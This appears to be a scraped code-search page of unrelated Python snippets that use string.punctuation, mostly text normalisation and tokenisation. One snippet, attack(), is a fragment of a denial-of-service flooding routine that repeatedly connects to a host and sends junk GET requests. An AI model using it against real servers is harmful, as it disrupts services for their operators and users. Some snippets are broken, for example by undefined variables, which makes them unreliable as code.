def test_bag_of_words_for_series():
dataset = fetch_20newsgroups(shuffle=True, random_state=1,
remove=('headers', 'footers', 'quotes'))
series = XSeries(dataset.data[:10])
assert series.data_type == str
translator = str.maketrans('', '', string.punctuation)
tokenizer_transformer = XSeriesTransformer(
transform_function=lambda text: text.lower().translate(translator).strip().split()
)
transformed_series = tokenizer_transformer.fit_transform(series)
# print(transformed_series)
bag_transform = BagOfWordsTransformer()
transformed_series = bag_transform.fit_transform(transformed_series)
# print(transformed_series)
assert type(transformed_series) == XDataFrame
python类punctuation()的实例源码
def __iter__(self):
"""
Read a file where each line is of the form "word1 word2 ..."
Yields lists of the form [word1, word2, ...]
"""
if os.path.isdir(self.fname):
filenames = [os.path.join(self.fname,f) for f in os.listdir(self.fname)]
else:
filenames = [self.fname]
for filename in filenames:
# with io.open(filename, encoding='utf-8') as f:
with open(filename) as f:
doc = f.read()
for line in doc.split("\n"):
#if not line: continue
sent = "".join([ch for ch in line.lower() if ch not in string.punctuation]).strip().split()
# sent = [word for word in line.strip().split()]
sent = [self.begin] + sent + [self.end]
yield sent
def __iter__(self):
"""
Read a file where each line is of the form "word1 word2 ..."
Yields lists of the form [word1, word2, ...]
"""
#jfbbb
if os.path.isdir(self.fname):
filenames = [os.path.join(self.fname,f) for f in os.listdir(self.fname)]
#else:
# filenames = [self.fname]
for langpath in filenames:
with open(filename) as f:
doc = f.read()
for line in doc.split("\n"):
#if not line: continue
sent = "".join([ch for ch in line.lower() if ch not in string.punctuation]).strip().split()
# sent = [word for word in line.strip().split()]
sent = [self.begin] + sent + [self.end]
yield sent
def hexdump(src, length=16, sep='.'):
"""
Displays a hex output of the content it is passed.
This was based on https://gist.github.com/7h3rAm/5603718 with some
minor modifications
"""
allowed = digits + ascii_letters + punctuation + ' '
print_map = ''.join(((x if x in allowed else '.')
for x in map(chr, range(256))))
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c + length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
if len(hex) > 24:
hex = "%s %s" % (hex[:24], hex[24:])
printable = ''.join(["%s" % (
(ord(x) <= 127 and print_map[ord(x)]) or sep) for x in chars])
lines.append("%08x: %-*s |%s|" % (c, length * 3, hex, printable))
return '\n'.join(lines)
def attack():
ip = socket.gethostbyname( host )
global n
msg=str(string.letters+string.digits+string.punctuation)
data="".join(random.sample(msg,5))
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
n+=1
dos.connect((ip, port))
dos.send( "GET /%s HTTP/1.1\r\n" % data )
print "\n "+time.ctime().split(" ")[3]+" "+"["+str(n)+"] #-#-# Hold Your Tears #-#-#"
except socket.error:
print "\n [ No connection! Server maybe down ] "
dos.close()
SentenceComparator.py 文件源码
项目:scientific-paper-summarisation
作者: EdCo95
项目源码
文件源码
阅读 35
收藏 0
点赞 0
评论 0
def removeCommonWords(self, sentence, common_words, tokenized=False):
"""Takes a sentence and list of stopwords and removes the stopwords from the sentence."""
if not tokenized:
words = sentence.split(' ')
else:
words = sentence
final_sentence = []
for word in words:
word = word.translate(string.maketrans("", ""), string.punctuation)
word = word.lower()
if word in common_words:
continue
else:
final_sentence.append(word)
return final_sentence
def ex3(argv):
password = ''
for i in range(len(argv)):
for j in range(int(argv[i])):
if i == 0:
password += string.uppercase[random.randint(0,len(string.uppercase)-1)]
elif i == 1:
password += string.lowercase[random.randint(0,len(string.lowercase)-1)]
elif i == 2:
password += string.digits[random.randint(0,len(string.digits)-1)]
elif i == 3:
password += string.punctuation[random.randint(0,len(string.punctuation)-1)]
return ''.join(random.sample(password,len(password)))
def mark(line):
tmp_line = ''
for c in line:
if c in string.punctuation:
if c is not "'":
tmp_line += ' ' + c + ' '
else:
tmp_line += ' ' + c
else:
tmp_line += c
tmp_line = tmp_line.lower()
words = [w for w in tmp_line.split() if len(w) > 0]
for w in words:
if w not in word2freq:
word2freq[w] = 1
else:
word2freq[w] += 1
return words
def _normalize_answer(s):
"""Normalize string to score answers according to SQuAD dataset scoring rules.
Remove articles, remove punctuation, fix multiple whitespaces in string, and convert all characters to lowercase.
"""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def tiny_tokenize(text, stem=False, stop_words=[]):
words = []
for token in wordpunct_tokenize(re.sub('[%s]' % re.escape(string.punctuation), ' ', \
text.decode(encoding='UTF-8', errors='ignore'))):
if not token.isdigit() and not token in stop_words:
if stem:
try:
w = EnglishStemmer().stem(token)
except Exception as e:
w = token
else:
w = token
words.append(w)
return words
# return [EnglishStemmer().stem(token) if stem else token for token in wordpunct_tokenize(
# re.sub('[%s]' % re.escape(string.punctuation), ' ', text.decode(encoding='UTF-8', errors='ignore'))) if
# not token.isdigit() and not token in stop_words]
def _extract_values_from_rpdr_notes(
rpdr_notes, phrase_type, phrases, ignore_punctuation,
show_n_words_context_before, show_n_words_context_after):
"""Return a list of NotePhraseMatches for each note in rpdr_notes."""
note_phrase_matches = []
if ignore_punctuation:
logging.info('ignore_punctuation is True, so we will also ignore '
'any punctuation in the entered phrases.')
phrases = [_remove_punctuation(phrase) for phrase in phrases]
match_contexts = PhraseMatchContexts(
show_n_words_context_before, show_n_words_context_after)
for rpdr_note in rpdr_notes:
if ignore_punctuation:
rpdr_note.remove_punctuation_from_note()
phrase_matches = _extract_phrase_from_notes(phrase_type, phrases,
rpdr_note, match_contexts)
note_phrase_matches.append(phrase_matches)
match_contexts.print_ordered_contexts()
return note_phrase_matches
def _words_plus_punc(self):
"""
Returns mapping of form:
{
'cat,': 'cat',
',cat': 'cat',
}
"""
no_punc_text = REGEX_REMOVE_PUNCTUATION.sub('', self.text)
# removes punctuation (but loses emoticons & contractions)
words_only = no_punc_text.split()
# remove singletons
words_only = set( w for w in words_only if len(w) > 1 )
# the product gives ('cat', ',') and (',', 'cat')
punc_before = {''.join(p): p[1] for p in product(PUNC_LIST, words_only)}
punc_after = {''.join(p): p[0] for p in product(words_only, PUNC_LIST)}
words_punc_dict = punc_before
words_punc_dict.update(punc_after)
return words_punc_dict
def ping(self, user, text = None):
"""Measure round-trip delay to another IRC client.
"""
if self._pings is None:
self._pings = {}
if text is None:
chars = string.letters + string.digits + string.punctuation
key = ''.join([random.choice(chars) for i in range(12)])
else:
key = str(text)
self._pings[(user, key)] = time.time()
self.ctcpMakeQuery(user, [('PING', key)])
if len(self._pings) > self._MAX_PINGRING:
# Remove some of the oldest entries.
byValue = [(v, k) for (k, v) in self._pings.items()]
byValue.sort()
excess = self._MAX_PINGRING - len(self._pings)
for i in xrange(excess):
del self._pings[byValue[i][1]]
NewsAutosummarize.py 文件源码
项目:Python-Scripts-Repo-on-Data-Science
作者: qalhata
项目源码
文件源码
阅读 41
收藏 0
点赞 0
评论 0
def _init_(self, min_cut=0.1, max_cut=0.9):
# identation changes - we are inside the constructor
# here we set up the behaviour
# this is called each time an object of feq summ class is
# created or instantiated
self._min_cut = min_cut # self=keyword that reports the variable
self._max_cut = max_cut
# we save the val of the 2 parameters passed by assigning them
# two member variables - the 'self.' prefix identifies them as part
# of the self argument - using underscore as first char.
self._stopwords = set(stopwords.words('english') + list(punctuation))
# this is alist of all common words and punc symols
# identation changes - we are out of the constructor here
# This is still the body of the class
# Defining var here ( outside a member function) but within the class
# member var becomes STATIC. This means it belongs to the class, and not
# to any specific individual instance (object) of the class
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def lemmatize_text(text, stop_words=STOPLIST, keep_pos=KEEP_POS):
'''
Function to lemmatize a single document of the corpus
INPUT:
text: string, text of review
stop_words: words to remove from text, default STOPLIST defined above
keep_pos: parts of speech to keep in text, default KEEP_POS def above
OUTPUT:
lemmatized text
'''
x = nlp(text)
words = [tok.lemma_.strip(punctuation) for tok in x if (
tok.pos_ in keep_pos) and (tok.lemma_.strip(punctuation) not in STOPLIST)]
words.extend(['boss' for tok in x if tok.lemma_ == 'bos'])
return ' '.join(words)
def header_link(title):
"""Return a github-style link target for a title.
>>> header_link('Hello there!')
'hello-there'
"""
# This doesn't do the-title-1, the-title-2 etc. with multiple titles
# with same text, but usually this doesn't matter.
result = ''
for character in title:
if character in string.whitespace:
result += '-'
elif character in string.punctuation:
pass
else:
result += character.lower()
return result
def header_link(title):
"""Return a github-style link target for a title.
>>> header_link('Hello there!')
'hello-there'
"""
# This doesn't handle multiple titles with the same text in the
# same file, but usually that's not a problem. GitHub makes
# links like the-title, the-title-1, the-title-2 etc.
result = ''
for character in title:
if character in string.whitespace:
result += '-'
elif character in string.punctuation:
pass
else:
result += character.lower()
return result
def _bots(self, ctx, amount: int=100):
"""Clears bots and bot calls."""
def check(m):
if m.author.bot:
return True
for mem in m.mentions:
if mem.bot:
return True
if m.content.startswith(tuple(i for i in string.punctuation)) and not bool(re.search(r'^<@!?(\d+)>', m.content)):
return True
return False
messages = await self.bot.purge_from(ctx.message.channel, limit=amount, before=ctx.message, check=check)
await self.bot.delete_message(ctx.message)
send = await self.bot.say("Successfully cleared **{}** messages".format(len(messages)))
await asyncio.sleep(3)
await self.bot.delete_message(send)
def could_be(self, other):
"""Return True if the other PersonName is not explicitly inconsistent."""
# TODO: Some suffix and title differences should be allowed
if type(other) is not type(self):
return NotImplemented
if self == other:
return True
for attr in ['title', 'firstname', 'middlename', 'nickname', 'prefix', 'lastname', 'suffix']:
if attr not in self or attr not in other:
continue
puncmap = dict((ord(char), None) for char in string.punctuation)
s = self[attr].lower().translate(puncmap)
o = other[attr].lower().translate(puncmap)
if s == o:
continue
if attr in {'firstname', 'middlename', 'lastname'}:
if (({len(comp) for comp in s.split()} == {1} and [el[0] for el in o.split()] == s.split()) or
({len(comp) for comp in o.split()} == {1} and [el[0] for el in s.split()] == o.split())):
continue
return False
return True
Sentiment Analysis.py 文件源码
项目:Twitter-Sentiment-Analysis-For-Birthday-Celebrities
作者: vishal-tiwari
项目源码
文件源码
阅读 33
收藏 0
点赞 0
评论 0
def posNegCount(self, tweet):
pos = 0
neg = 0
for p in list(punctuation):
tweet = tweet.replace(p, '')
tweet = tweet.lower()
words = tweet.split(' ')
word_count = len(words)
for word in words:
if word in self.positive_words:
pos = pos + 1
elif word in self.negative_words:
neg = neg + 1
return pos, neg
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def LemNormalize(text):
# convert non ascii characters
text = text.encode('ascii', 'replace').decode()
# remove punctuation and digits
remove_punct_and_digits = dict([(ord(punct), ' ') for punct in string.punctuation + string.digits])
transformed = text.lower().translate(remove_punct_and_digits)
# shortword = re.compile(r'\W*\b\w{1,2}\b')
# transformed = shortword.sub('', transformed)
# tokenize the transformed string
tokenized = nltk.word_tokenize(transformed)
# remove short words (less than 3 char)
tokenized = [w for w in tokenized if len(w) > 3]
tokenizer = LemTokens(tokenized)
return tokenizer
def LemNormalizeIt(text):
# convert non ascii characters
text = text.encode('ascii', 'replace').decode()
# remove punctuation and digits
remove_punct_and_digits = dict([(ord(punct), ' ') for punct in string.punctuation + string.digits])
transformed = text.lower().translate(remove_punct_and_digits)
# tokenize the transformed string
tokenized = nltk.word_tokenize(transformed)
# apply lemming with morph it
morph_it = load_morph_it()
tokenized = [morph_it.get(w, w) for w in tokenized if len(w) > 3]
return tokenized
def preprocessing(content):
remove_punc = ('? ? ? ? ? ? ? ? ? —').split(' ')
## preprocessing #1 : remove XXenglishXX and numbers
preprocessing_1 = re.compile(r'\d*',re.L) ## only substitute numbers
#preprocessing_1 = re.compile(r'\w*',re.L) ## substitute number & English
content = preprocessing_1.sub("",content)
## preprocessing #2 : remove punctuation
preprocessing_2 = re.compile('[%s]' % re.escape(string.punctuation))
content = preprocessing_2.sub("",content)
## preprocessing #3 : remove Chinese punctuation and multiple whitspaces
content = content.replace('\n','')
for punc in remove_punc:
content = content.replace(punc,'')
try:
content = parsing.strip_multiple_whitespaces(content)
except:
print 'Warning : failed to strip whitespaces @ '
return content
def get_anilist_links(title):
"""Iterates through all search methods until link is constructed"""
exclude = set(string.punctuation)
title = ''.join(ch for ch in title if ch not in exclude)
title = title.lower().split(' ')
if 'season' in title:
title.remove('season')
title = ' '.join(title)
anilist_regex = re.compile(r'http(s)?://anilist.co/anime/([0-9]){1,5}(/.*)?')
link_dispatcher = {'api': _get_anilist_link_by_api}
for _, v in link_dispatcher.items():
anilist_url = v(title)
if anilist_url is None:
continue
if re.match(anilist_regex, anilist_url) is not None:
return anilist_url
return
def search_crunchyroll(anime):
"""Searches if anime exists on Crunchyroll and returns a link"""
try:
exclude = set(string.punctuation)
anime = ''.join(ch for ch in anime if ch not in exclude)
keywords = anime.split(' ')
crunchy_api = MetaApi()
crunchyroll_listing = []
while len(keywords) > 0:
crunchyroll_listing = list(crunchy_api.search_anime_series(' '.join(keywords)))
if len(crunchyroll_listing) <= 0:
print('No crunchyroll listings found')
keywords.pop()
continue
else:
break
except:
print('Crunchyroll url couldn\'t be retrieved')
return
return crunchyroll_listing[0].url if len(crunchyroll_listing) > 0 else None
def search_funimation(anime):
"""Checks if anime exists on Funimation website and returns a link"""
try:
exclude = set(string.punctuation)
anime = ''.join(ch for ch in anime if ch not in exclude)
keywords = anime.split(' ')
funi_url = None
while len(keywords) > 0:
show_slug = '-'.join(keywords).lower()
funi_url = f'https://www.funimation.com/shows/{show_slug}/'
funi_url = utilities.make_get_request(funi_url)
if funi_url is None:
keywords.pop()
continue
else:
break
except:
print('Funimation url couldn\'t be retrieved')
return
return funi_url.url if funi_url is not None else None
def search_animelab(anime):
"""Checks if anime title exists on AnimeLab website and returns a link"""
try:
exclude = set(string.punctuation)
anime = ''.join(ch for ch in anime if ch not in exclude)
keywords = anime.split(' ')
animelab_url = None
while len(keywords) > 0:
show_slug = '-'.join(keywords).lower()
animelab_url = f'https://www.animelab.com/shows/{show_slug}'
animelab_url = utilities.make_get_request(animelab_url)
if animelab_url is None:
keywords.pop()
return
else:
break
except:
print('Animelab url couldn\'t be retrieved')
return
return animelab_url.url
def __init__(self, clean_config = None):
self.cc = {
'lower' : False,
'punctuation' : False,
'whitespace' : False,
'digit' : False,
}
# Override clean config and validation check
if clean_config != None:
for key, value in clean_config.iteritems():
if key in self.cc:
if value not in [True, False,1,0]:
print ("Invalid: Incorrect boolean value: "+str(value)+" for key: " + str(key))
else:
self.cc[key] = value
else:
print ("Invalid: Cleaner not recognized: " + str(key) + ", available Cleaners: " +
", ".join(self.cc.keys()))
cleaners_applied = [key for key in self.cc if self.cc[key]]
if cleaners_applied:
print ("Applying Cleaners: " + ", ".join(cleaners_applied))
else:
print ("Warning: No cleaners in config")